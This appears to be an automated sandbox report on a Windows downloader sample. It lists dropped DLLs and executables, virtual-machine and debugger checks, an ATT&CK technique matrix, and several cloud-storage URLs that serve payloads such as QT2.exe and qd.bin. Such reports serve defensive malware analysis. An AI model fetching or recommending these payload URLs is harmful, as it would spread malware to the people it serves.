Source: LisectAVT_2403002B_78.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: LisectAVT_2403002B_78.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: LisectAVT_2403002B_78.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: LisectAVT_2403002B_78.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: LisectAVT_2403002B_78.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: LisectAVT_2403002B_78.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: LisectAVT_2403002B_78.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: LisectAVT_2403002B_78.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\build\ob\bora-21772623\cayman_glib\glib\src\build\win32\vs14\Release\Win32\bin\gthread-2.0.pdb source: LisectAVT_2403002B_78.exe, 00000000.00000003.2514743145.00000000009D9000.00000004.00000020.00020000.00000000.sdmp, libcurl[1].dll.0.dr, libcurl.dll.0.dr
Source: Binary string: C:\Users\Administrator\Documents\Project2\Project2\Release\Project2.pdb source: libcurl[1].dll.0.dr, libcurl.dll.0.dr
Source: Binary string: msvcr120.i386.pdb source: msvcr120[1].dll.0.dr, msvcr120.dll.0.dr
Source: Binary string: msvcp120.i386.pdb source: msvcp120.dll.0.dr, msvcp120[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdbGCTL source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: I:\build\trunk_cn_9.0build\simulator\bin\dnmultiplayerex.pdb source: QT2[1].exe.0.dr, software.exe.0.dr
Source: Binary string: wab.pdbGCTL source: LisectAVT_2403002B_78.exe
Source: Binary string: D:\a\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: wab.pdb source: LisectAVT_2403002B_78.exe
Source: LisectAVT_2403002B_78.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: LisectAVT_2403002B_78.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: LisectAVT_2403002B_78.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: LisectAVT_2403002B_78.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: LisectAVT_2403002B_78.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: msvcp140.dll.0.drStatic PE information: 0x771734A7 [Mon Apr 25 02:38:31 2033 UTC]
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00AAA223 push ecx; ret 0_2_00AAA236
Source: msvcr120[1].dll.0.drStatic PE information: section name: .text entropy: 6.95576372950548
Source: msvcr120.dll.0.drStatic PE information: section name: .text entropy: 6.95576372950548
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\libcurl[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Program Files (x86)\Mysoftwaref\cximagecrt.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cximagecrt[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Program Files (x86)\Mysoftwaref\vcruntime140.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Program Files (x86)\Mysoftwaref\msvcp140.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Program Files (x86)\Mysoftwaref\libcurl.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcr120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Program Files (x86)\Mysoftwaref\software.exeJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\QT2[1].exeJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Program Files (x86)\Mysoftwaref\msvcp120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeFile created: C:\Program Files (x86)\Mysoftwaref\msvcr120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\libcurl[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\msvcp140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vcruntime140[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeDropped PE file which has not been started: C:\Program Files (x86)\Mysoftwaref\cximagecrt.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cximagecrt[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeDropped PE file which has not been started: C:\Program Files (x86)\Mysoftwaref\vcruntime140.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeDropped PE file which has not been started: C:\Program Files (x86)\Mysoftwaref\msvcp140.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeDropped PE file which has not been started: C:\Program Files (x86)\Mysoftwaref\libcurl.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcr120[1].dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeDropped PE file which has not been started: C:\Program Files (x86)\Mysoftwaref\software.exeJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\QT2[1].exeJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeDropped PE file which has not been started: C:\Program Files (x86)\Mysoftwaref\msvcr120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeDropped PE file which has not been started: C:\Program Files (x86)\Mysoftwaref\msvcp120.dllJump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00ABDEF1 FindFirstFileExW,0_2_00ABDEF1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00AA2EC0 GetSystemInfo,CreateDirectoryA,task,task,task,task,task,task,task,task,task,task,task,task,task,task,0_2_00AA2EC0
Source: Amcache.hve.8.drBinary or memory string: VMware
Source: Amcache.hve.8.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.8.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.8.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.8.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.8.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: LisectAVT_2403002B_78.exe, 00000000.00000003.2322734496.000000000097C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000097C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.8.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: libcurl.dll.0.drBinary or memory string: VMware, Inc.1
Source: libcurl.dll.0.drBinary or memory string: VMware, Inc.0
Source: Amcache.hve.8.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: LisectAVT_2403002B_78.exe, 00000000.00000002.2842779785.000000000090E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`
Source: Amcache.hve.8.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.8.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.8.drBinary or memory string: vmci.sys
Source: Amcache.hve.8.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.8.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.8.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.8.drBinary or memory string: VMware20,1
Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.8.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.8.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.8.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.8.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.8.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.8.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.8.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.8.drBinary or memory string: VMware Virtual RAM
Source: Amcache.hve.8.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: libcurl.dll.0.drBinary or memory string: noreply@vmware.com
Source: Amcache.hve.8.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00AB10E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AB10E1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00AC17D8 GetProcessHeap,0_2_00AC17D8
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00AB10E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AB10E1
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00AAA4D7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AAA4D7
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00AAA63A SetUnhandledExceptionFilter,0_2_00AAA63A
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00AAA922 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AAA922
Source: QT2[1].exe.0.dr, software.exe.0.drBinary or memory string: .lnkresolveShortcutFromFile buffer is too smallutility::usystem::resolveShortcutFromFilenot traywndShell_TrayWndit is pcutility::usystem::getSystBarHeightit is notebookutility::usystem::isNoteBookPCutility::usystem::isNoteBookPCrunasshell filename = [%s], param = [%s], runas = %d, show = %dutility::process::shellshellEx ret . lastError = %dopenshellEx failed!!! lastError = %dutility::process::shellrunasshellEx filename = [%s], param = [%s], runas = %d, show = %d, timeout = %dutility::process::shellutility::process::shellExutility::process::shellExshellEx failed!!! lastError = %dutility::process::shellExshellEx exitcode = %d lastError = %dutility::process::shellExshellEx timeout!!!utility::process::shellExutility::process::executeshellEx failed!!! lastError = %dutility::process::executeexecute failed!!! last error = %dutility::process::executeexecute exitcode = %d lastError = %dexecute timeout!!!utility::process::executeexecute failed!!! lastError = %dutility::process::executeexecute failed!!! last error = %dutility::process::executeexecute exitcode = %d lastError = %dutility::process::executeexecute timeout!!!utility::process::executeexecute failed!!!""execute process %s utility::process::executeForBatFileexecute signaled. lastError = %dexecute timeout!!!utility::process::executeForBatFileexecute failed!!! lastError = %dutility::process::executeForBatFileexecute process endutility::process::executeForBatFileutility::process::executeForBatFileexecute process error. lastError = %dutility::process::executeForBatFilecreateProcess filename = [%s], param = [%s], show = %d"utility::process::create "utility::process::createutility::process::kill32createProcess failed!!! lastError = %dkill32 h is null pid = %d error = %dutility::process::kill32kill32 progress failed pid = %d lasterror = %dutility::process::killempty enum progress lasterror = %dutility::process::killnot find progress name = %s, pid = %dutility::EnableDebugPriv
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00AAA745 cpuid 0_2_00AAA745
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00AC1023
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: GetLocaleInfoW,0_2_00AC1276
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00AC139F
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: GetLocaleInfoW,0_2_00AC14A5
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00AC157B
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: EnumSystemLocalesW,0_2_00AB79B9
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_00AC0C06
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: EnumSystemLocalesW,0_2_00AC0EB2
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: GetLocaleInfoW,0_2_00AB7EE5
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: EnumSystemLocalesW,0_2_00AC0EFD
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: EnumSystemLocalesW,0_2_00AC0F98
Source: C:\Users\user\Desktop\LisectAVT_2403002B_78.exeCode function: 0_2_00AAA3C7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00AAA3C7
Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.drBinary or memory string: msmpeng.exe
Source: Amcache.hve.8.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.8.drBinary or memory string: MsMpEng.exe
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
2
Process Injection
2
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
11
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading
1
Virtualization/Sandbox Evasion
LSASS Memory1
Query Registry
Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Process Injection
Security Account Manager41
Security Software Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS1
Virtualization/Sandbox Evasion
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
Obfuscated Files or Information
LSA Secrets1
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Software Packing
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Timestomp
DCSync23
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
LisectAVT_2403002B_78.exe100%AviraTR/Dldr.Agent.yrbfh
LisectAVT_2403002B_78.exe100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://upx.sf.net0%URL Reputationsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dllR0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dlluR0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.d0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/QT2.exeL0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Dp0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/cximagecrt.dll9RB0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Dq0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcr120.dll0%Avira URL Cloudsafe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dll0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp120.dll0%Avira URL Cloudsafe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlldll0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/4p0%Avira URL Cloudsafe
https://HTTP/1.10%Avira URL Cloudsafe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/&#_0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/0%Avira URL Cloudsafe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlldllTCh0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.a0%Avira URL Cloudsafe
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/Tp0%Avira URL Cloudsafe
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/j0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/msvcp140.dllFM0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Tp0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/Tq0%Avira URL Cloudsafe
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/qd.bin0%Avira URL Cloudsafe
https://wwwbin-1323571107.cos.ap-guangzhou.myqcloud.com/0%Avira URL Cloudsafe
http://www.ijg.org0%Avira URL Cloudsafe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dllo0%Avira URL Cloudsafe
http://cacerts.di0%Avira URL Cloudsafe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/libcurl.dlld0%Avira URL Cloudsafe
https://www80-1323570959.cos.ap-singapore.myqcloud.com/0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/j0%Avira URL Cloudsafe
https://wwwdll-1323570959.cos.ap-singapore.myqcloud.com/vcruntime140.dll0%Avira URL Cloudsafe
